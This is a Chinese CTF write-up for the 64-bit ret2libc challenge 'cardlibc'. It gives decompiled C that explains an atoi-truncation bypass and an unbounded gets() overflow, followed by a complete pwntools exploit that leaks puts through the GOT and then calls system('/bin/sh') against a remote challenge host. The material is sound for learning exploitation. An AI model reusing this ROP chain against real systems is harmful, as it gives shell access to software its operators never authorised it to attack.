cardlibc(64位ret2libc)

题目:

int __fastcall main(int argc, const char **argv, const char **envp)
{
  char s[64]; // [rsp+0h] [rbp-40h] BYREF

  init(argc, argv, envp);
  // Bounded read: at most 16 characters plus the terminator, well inside s[64].
  __isoc99_scanf("%16s", s);
  // 45 == '-': any input containing a minus sign is sent to joker().
  if ( strchr(s, 45) )
  {
    joker();
    return 0;
  }
  else
  {
    // Gate for card(): atoi(s) must be negative even though no '-' is present.
    // atoi() returns int (on glibc it is (int)strtol()), so a numeral that does
    // not fit in 32 bits is truncated and can come out negative; this sign test
    // is therefore not a reliable guard. A range-checked strtol() would be.
    if ( atoi(s) >= 0 )
      joker();
    else
      card();
    return 0;
  }
}


int joker()
{
  // Emits the three "joker" messages in order and returns the result of the
  // final puts() call, exactly as the original sequence of calls does.
  static const char *const lines[] = {
    "Go back to Gotham, Batman won't hit you again.",
    ".\n.\n.\n.\n.\n.\n.\n",
    "Welcome back to Gotham, Joker!\n",
  };
  int rc = 0;
  for (size_t i = 0; i < sizeof lines / sizeof lines[0]; i++) {
    rc = puts(lines[i]);
  }
  return rc;
}


int card()
{
  char s[64]; // [rsp+0h] [rbp-40h] BYREF

  puts("Give you a chance to fight Batman!");
  // Consumes the newline left in stdin by main()'s scanf().
  getchar();
  // gets() has no length bound: input longer than 64 bytes overruns s and the
  // saved frame data that follows it on the stack (s sits at rbp-0x40).
  // The fix is a bounded read, e.g. fgets(s, sizeof s, stdin).
  gets(s);
  return puts(s);
}

注意：payload = b'a'*(0x40+8)+p64(rdi)+p64(got)+p64(plt)+p64(main)，这里的返回地址是 main；如果改成 card 的话会报错。
exp:

from pwn import *
from LibcSearcher import *
def conn() -> None:
	# Opens the connection and loads the challenge ELF for symbol lookup;
	# the commented-out process() line is the local-testing variant.
	global r,elf,libc
	#r = process("./cardlibc")
	r = remote("1.95.36.136", 2106)
	elf = ELF("./cardlibc")

def pwn() -> None:
	# Two-stage ret2libc against the unbounded gets() in card(): stage 1 leaks
	# the libc address of puts via its GOT entry and returns into main(); stage 2
	# reuses the same overflow with the libc-derived addresses.
	got = elf.got["puts"]
	plt = elf.plt["puts"]
	main = elf.sym["main"]
	card = 0x40088f  # unused below (the author's note explains why main is the return target)
	print(">>>",hex(got))
	# Input that reaches card(): contains no '-' and makes main()'s atoi() check negative.
	r.sendline(b"3333333333")
	rdi = 0x00000000004009b3
	# Overflow s[64] plus saved rbp, then puts(got) to print the GOT entry, then main.
	payload = b'a'*(0x40+8)+p64(rdi)+p64(got)+p64(plt)+p64(main)
	r.sendline(payload)
	r.recvline()
	r.recvline()
	puts = u64(r.recvline()[:-1].ljust(8,b'\x00'))
	print("puts>>>",hex(puts))
	#libc = LibcSearcher("puts",puts)
	# Hard-coded offsets for the remote's libc build (LibcSearcher variant above
	# is commented out); they are specific to that libc and not portable.
	libc = puts- 	0x06f6a0 	
	sys =  libc+0x0453a0
	sh =  libc+ 0x18ce57
	ret = 0x0000000000400649  # unused below
	payload = b'a'*(0x40+8)+p64(rdi)+p64(sh)+p64(sys)
	r.sendline(b"3333333333")
	#gdb.attach(r)
	r.sendlineafter(b'Batman!\n',payload)
	
	r.interactive()
# Connect, then run the two-stage chain.
conn()
pwn()